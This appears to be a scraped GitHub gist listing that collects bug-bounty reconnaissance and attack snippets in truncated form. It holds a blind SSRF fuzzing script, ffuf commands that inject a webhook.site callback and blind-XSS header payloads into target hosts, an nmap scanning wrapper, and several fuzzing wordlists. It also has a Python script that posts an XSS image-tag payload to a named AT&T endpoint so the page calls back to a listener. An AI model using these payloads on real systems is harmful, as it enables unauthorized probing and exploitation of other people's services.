| Filter | Description | Example |
|---|---|---|
| allintext | Searches for occurrences of all the keywords given. | allintext:"keyword" |
| intext | Searches for the occurrences of keywords all at once or one at a time. | intext:"keyword" |
| inurl | Searches for a URL matching one of the keywords. | inurl:"keyword" |
| allinurl | Searches for a URL matching all the keywords in the query. | allinurl:"keyword" |
| intitle | Searches for occurrences of keywords in title all or one. | intitle:"keyword" |
0xbloody
hussein98d
/ ssrf.sh
Created
May 7, 2020 02:09
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d" | |
| echo "Usage: bash script.sh domain.com http://server-callbak" | |
| echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls" | |
| if [ -z "$1" ]; then | |
| echo >&2 "ERROR: Domain not set" | |
| exit 2 | |
| fi | |
| if [ -z "$2" ]; then | |
| echo >&2 "ERROR: Sever link not set" | |
| exit 2 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ffuf -c -u FUZZ1 -H "FUZZ2: FUZZ3" -w alive_uber.txt:FUZZ1 -w headers.txt:FUZZ2 -w blind_xss.txt:FUZZ3 -x http://192.168.196.1:8082 -mode clusterbomb -v | |
| ffuf -c -u HOST/?PROT=https://webhook.site/f4494fd5-bd02-4fd2-893d-22368ac954b8/HOST/PROT -w alive_uber.txt:HOST -w ssrf_params:PROT -x http://192.168.196.1:8082 -mode clusterbomb -r -v | |
| ffuf -c -u HOST/?url=http://{my-server-ip}/DOMAIN/url&file=http://{my-server-ip}/DOMAIN/file -w hosts.txt:HOST -w domains.txt:DOMAIN -mode pitchfork -v |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/bin/bash | |
| #Performs port scan using nmap | |
| print_usage() { | |
| cat << _EOF_ | |
| Utility to scan open ports. Can be used to scan ports for a domain or a list of domains specified in a file. | |
| Example Usage: | |
| -h, --help Show brief help | |
| -d, --domain Domain name or ip to scan | |
| -f, --file Spefify a file containing domains/IPs to scan |
yassineaboukir
/ List of API endpoints & objects
Last active
August 20, 2025 03:39
A list of 3203 common API endpoints and objects designed for fuzzing.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 0 | |
| 00 | |
| 01 | |
| 02 | |
| 03 | |
| 1 | |
| 1.0 | |
| 10 | |
| 100 | |
| 1000 |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests | |
| url = "https://onlinefaxtwo.att.com/loa.php" | |
| listener = input('Listener address. default port [80]: ') | |
| headers = {'Content-type': 'application/x-www-form-urlencoded'} | |
| data = {'uCompanyName': '<img src="http://' + listener + '">', | |
| 'uPersonAuth':'asas', |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /.s3cfg | |
| /phpunit.xml | |
| /nginx.conf | |
| /.vimrc | |
| /LICENSE.md | |
| /yarn.lock | |
| /Gulpfile | |
| /Gulpfile.js | |
| /composer.json | |
| /.npmignore |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import requests, json | |
| from requests.packages.urllib3.exceptions import InsecureRequestWarning, InsecurePlatformWarning, SNIMissingWarning | |
| from bs4 import BeautifulSoup | |
| requests.packages.urllib3.disable_warnings(InsecureRequestWarning) | |
| requests.packages.urllib3.disable_warnings(InsecurePlatformWarning) | |
| requests.packages.urllib3.disable_warnings(SNIMissingWarning) | |
| # another source of cidrs by asn | |
| def getIPCidrs(asn): |
nullenc0de
/ content_discovery_nullenc0de.txt
Last active
April 2, 2025 06:37
content_discovery_nullenc0de.txt
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| / | |
| $$$lang-translate.service.js.aspx | |
| $367-Million-Merger-Blocked.html | |
| $defaultnav | |
| ${idfwbonavigation}.xml | |
| $_news.php | |
| $search2 | |
| £º | |
| .0 |